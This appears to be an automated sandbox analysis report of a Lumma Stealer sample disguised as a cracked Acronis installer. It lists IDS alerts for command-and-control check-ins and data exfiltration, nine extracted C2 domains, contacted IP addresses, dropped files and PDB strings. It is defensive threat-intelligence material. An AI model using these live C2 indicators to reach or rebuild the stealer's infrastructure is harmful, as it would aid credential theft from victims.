                2024-12-23T10:35:36.708516+010020283713Unknown Traffic192.168.2.1649704172.67.129.49443TCP
                2024-12-23T10:35:39.155246+010020283713Unknown Traffic192.168.2.1649705172.67.129.49443TCP
                2024-12-23T10:35:41.501174+010020283713Unknown Traffic192.168.2.1649706172.67.129.49443TCP
                2024-12-23T10:35:44.561219+010020283713Unknown Traffic192.168.2.1649707172.67.129.49443TCP
                2024-12-23T10:35:47.430212+010020283713Unknown Traffic192.168.2.1649708172.67.129.49443TCP
                2024-12-23T10:35:50.025436+010020283713Unknown Traffic192.168.2.1649709172.67.182.135443TCP
                2024-12-23T10:35:52.533661+010020283713Unknown Traffic192.168.2.164971045.66.248.134443TCP
                2024-12-23T10:36:04.160666+010020283713Unknown Traffic192.168.2.1649713172.67.129.49443TCP
                2024-12-23T10:36:06.433805+010020283713Unknown Traffic192.168.2.1649714172.67.129.49443TCP
                2024-12-23T10:36:08.927664+010020283713Unknown Traffic192.168.2.1649715172.67.129.49443TCP
                2024-12-23T10:36:11.225911+010020283713Unknown Traffic192.168.2.1649716172.67.129.49443TCP
                2024-12-23T10:36:13.871555+010020283713Unknown Traffic192.168.2.1649717172.67.129.49443TCP
                2024-12-23T10:36:16.247344+010020283713Unknown Traffic192.168.2.1649718172.67.129.49443TCP
                2024-12-23T10:36:18.521402+010020283713Unknown Traffic192.168.2.1649719172.67.129.49443TCP
                2024-12-23T10:36:21.021576+010020283713Unknown Traffic192.168.2.1649720172.67.129.49443TCP
                2024-12-23T10:36:22.922853+010020283713Unknown Traffic192.168.2.1649721172.67.182.135443TCP
                2024-12-23T10:36:24.194307+010020283713Unknown Traffic192.168.2.164972245.66.248.134443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T10:35:30.680014+010020546531A Network Trojan was detected192.168.2.1649701172.67.129.49443TCP
                2024-12-23T10:35:32.670883+010020546531A Network Trojan was detected192.168.2.1649702172.67.129.49443TCP
                2024-12-23T10:35:48.489015+010020546531A Network Trojan was detected192.168.2.1649708172.67.129.49443TCP
                2024-12-23T10:36:05.216655+010020546531A Network Trojan was detected192.168.2.1649713172.67.129.49443TCP
                2024-12-23T10:36:07.234528+010020546531A Network Trojan was detected192.168.2.1649714172.67.129.49443TCP
                2024-12-23T10:36:21.780501+010020546531A Network Trojan was detected192.168.2.1649720172.67.129.49443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T10:35:30.680014+010020498361A Network Trojan was detected192.168.2.1649701172.67.129.49443TCP
                2024-12-23T10:36:05.216655+010020498361A Network Trojan was detected192.168.2.1649713172.67.129.49443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T10:35:32.670883+010020498121A Network Trojan was detected192.168.2.1649702172.67.129.49443TCP
                2024-12-23T10:36:07.234528+010020498121A Network Trojan was detected192.168.2.1649714172.67.129.49443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T10:35:42.313661+010020480941Malware Command and Control Activity Detected192.168.2.1649706172.67.129.49443TCP
                2024-12-23T10:36:12.366139+010020480941Malware Command and Control Activity Detected192.168.2.1649716172.67.129.49443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T10:35:44.565019+010028438641A Network Trojan was detected192.168.2.1649707172.67.129.49443TCP
                2024-12-23T10:36:18.525635+010028438641A Network Trojan was detected192.168.2.1649719172.67.129.49443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Palestine.com.6176.17.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["necklacebudi.lat", "aspecteirs.lat", "sustainskelet.lat", "shearhoaxx.click", "grannyejh.lat", "crosshuaht.lat", "energyaffai.lat", "rapeflowwj.lat", "discokeyus.lat"], "Build id": "Ol1wEfA--w"}
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msncore.dllReversingLabs: Detection: 47%
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeReversingLabs: Detection: 18%
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeReversingLabs: Detection: 18%

                Exploits

                barindex
                Source: Yara matchFile source: 00000027.00000002.2156116548.000000000974A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: acronis recovery expert deluxe 1.0.0.132.rarl.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msvcr80.dll
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.182.135:443 -> 192.168.2.16:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.66.248.134:443 -> 192.168.2.16:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.35.89:443 -> 192.168.2.16:49711 version: TLS 1.2
                Source: acronis recovery expert deluxe 1.0.0.132.rarl.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: D:\Jenkins\workspace\AC_KillProcess\x64\Release\KillProcess.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008E15000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\agent\_work\4\s\binaries\amd64ret\bin\amd64\\vcruntime140_1d.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGAManufacturerLib\x64\Release\VGAManufacturerLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ML\Code\ACUT\Server\ACUT V2.2.12.0\ACUninstallTool\x64\Release\ServiceUninstall.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGATypeLib\x64\Release\VGATypeLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\openssl-1.1.1j\libcrypto-1_1-x64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000903C000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\CPUManufacturerCmdLib\x64\Release\CPUManufacturerCmdLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VideoMemoryLib\x64\Release\VideoMemoryLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGAManufacturerLib\x64\Release\VGAManufacturerLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msidcrl40.pdb source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp
                Source: Binary string: msidcrl40.pdbL source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp
                Source: Binary string: wntdll.pdb source: msn.exe, 00000027.00000002.2177671711.0000000009D57000.00000004.00000020.00020000.00000000.sdmp, msn.exe, 00000027.00000002.2183545080.000000000A0B0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtscript\lib\Qt5ScriptTools.pdbmm source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\temp\atkexComSvc\Release\aaHMLib.pdb source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msvcp140d.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Working\MB\library\ProArt MB\Release\FanProfile.pdb! source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\NICInfoLib\x64\Release\NICInfoLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\CPUTypeCmdLib\x64\Release\CPUTypeCmdLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: vcruntime140d.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msnmsgr.pdb source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp
                Source: Binary string: d:\workspace\sdk-for-net-publish\src\KeyVault\Microsoft.Azure.KeyVault.Core\obj\Net40-Release\Microsoft.Azure.KeyVault.Core.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: z:\libusb\libusb\os\objfre_wxp_x86\amd64\libusb-1.0.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\cpuid2\CPUIDSDK\makefiles\win32_dll\vc2008\Release\cpuidsdk.pdbp source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008654000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\openssl-1.1.1j\libssl-1_1-x64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\UserExperienceImprovementPlugin.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\hwcomponent\production_V5.9\Service\ServiceSDK\Release\HWComponentPlugin\HWComponentPlugin.pdb33 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\ja\workspace\common\tp-qt\979\product\webkit-vs-release\qtdeclarative\qml\QtQuick\Window.2\windowplugin.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\git\azure-storage-net-nofork\Lib\WindowsDesktop.Split\Blob\obj\Release\Microsoft.Azure.Storage.Blob.pdbtU source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb** source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\p4clients\rel_beta\Projects\GazelleProto\Client\Engine\VC80_Release_Static\SteamEngine.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\git\azure-storage-net-nofork\Lib\Common.Split\NetFx\obj\Release\Microsoft.Azure.Storage.Common.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Dropbox\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net45\Newtonsoft.Json.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\ja\workspace\common\ati-shell\3260\product\exe\vsa64\release\ti_managers_proxy_stub.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DIMMCapacityLib\x64\Release\DIMMCapacityLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\buildworker\steam_rel_client_win32\build\src\external\SDL3\Release\SDL3.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMManufacturerLib\x64\Release\DRAMManufacturerLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\git\azure-storage-net-nofork\Lib\WindowsDesktop.Split\Blob\obj\Release\Microsoft.Azure.Storage.Blob.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\AIControlLib\x64\Release\AIControlLib.pdbF source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGATypeLib\x64\Release\VGATypeLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\UserExperienceImprovementPlugin.pdb88 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMSpeedLib\x64\Release\DRAMSpeedLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\AIControlLib\x64\Release\AIControlLib.pdb source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ML\Code\ACUT\Server\ACUT V2.2.12.0\ACUninstallTool\Uninstaller\obj\x64\Release\Uninstaller.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: msn.exe, 00000027.00000002.2177671711.0000000009D57000.00000004.00000020.00020000.00000000.sdmp, msn.exe, 00000027.00000002.2183545080.000000000A0B0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\mb_home\production_V5.9\Service\ServiceSDK\Release\MB_Home\MB_Home.pdbLL source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Dropbox\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net45\Newtonsoft.Json.pdb4 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: System.Net.Http.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMSpeedLib\x64\Release\DRAMSpeedLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\LogHelper\obj\Release\LogHelper.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\HardDiskCapacityLib\x64\Release\HardDiskCapacityLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Working\MB\library\ProArt MB\Release\FanProfile.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\OPHWInfo\x64\Release\OPHWInfo.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\temp\atkexComSvc\x64\Release\aaHMLib.pdb source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\projects\SDL_ttf\build-steam\RelWithDebInfo\SDL3_ttf.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\hwcomponent\production_V5.9\Service\ServiceSDK\Release\HWComponentPlugin\HWComponentPlugin.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\workspace\sdk-for-net-publish\src\KeyVault\Microsoft.Azure.KeyVault.Core\obj\Net40-Release\Microsoft.Azure.KeyVault.Core.pdb\.~. p._CorDllMainmscoree.dll source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\ja\workspace\common\tp-qt\979\product\webkit-vs-release\qtbase\plugins\sqldrivers\qsqlite.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Sql.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DIMMCapacityLib\x64\Release\DIMMCapacityLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DiskMediaTypeLib\x64\Release\DiskMediaTypeLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMManufacturerLib\x64\Release\DRAMManufacturerLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Avery_IronMan\Documents\project\BigDataServer\HttpUtility\x64\Release\HttpUtilityV2.pdb00 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\cpuid2\CPUIDSDK\makefiles\win32_dll\vc2008\Release\cpuidsdk.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008654000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: vcruntime140d.amd64.pdb,,, source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\ja\workspace\common\tp-qt\979\product\webkit-vs-release\qtgraphicaleffects\qml\QtGraphicalEffects\private\qtgraphicaleffectsprivate.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\UninstallFanCtrlSvcLib\x64\Release\UninstallFanCtrlSvcLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\dvs\p4\build\sw\grid\oss\POCO\1.10.1-all\_out\msvc1600\x86\Release\dynamic_runtime\PocoInitializer\PocoInitializer.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Avery_IronMan\Documents\project\BigDataServer\HttpUtility\x64\Release\HttpUtilityV2.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Sql.pdb00 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\USBInfoLib\x64\Release\USBInfoLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\agent\_work\4\s\binaries\amd64ret\bin\amd64\\vcruntime140_1d.amd64.pdb!!! source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtscript\lib\Qt5ScriptTools.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\ja\workspace\common\ati-shell\3260\product\exe\vsa64\release\ti_managers_proxy_stub.pdb|| source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_InstallTools\DeviceUninstall\x64\Release\DeviceUninstall.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\mb_home\production_V5.9\Service\ServiceSDK\Release\MB_Home\MB_Home.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: contactsUX.pdb source: msn.exe, 00000027.00000002.2223565420.000000005A701000.00000020.00000001.01000000.00000012.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtscript\lib\Qt5Script.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msncore.pdb source: msn.exe, 00000027.00000002.2194406333.0000000059101000.00000020.00000001.01000000.00000010.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\UninstallFanCtrlSvcLib\x64\Release\UninstallFanCtrlSvcLib.pdb2 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ML\Code\ACUT\Server\ACUT V2.2.12.0\ACUninstallTool\x64\Release\HalUninstall.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\650429\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\650429Jump to behavior

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.16:49706 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.16:49702 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49702 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49708 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.16:49707 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.16:49701 -> 172.67.129.49:443
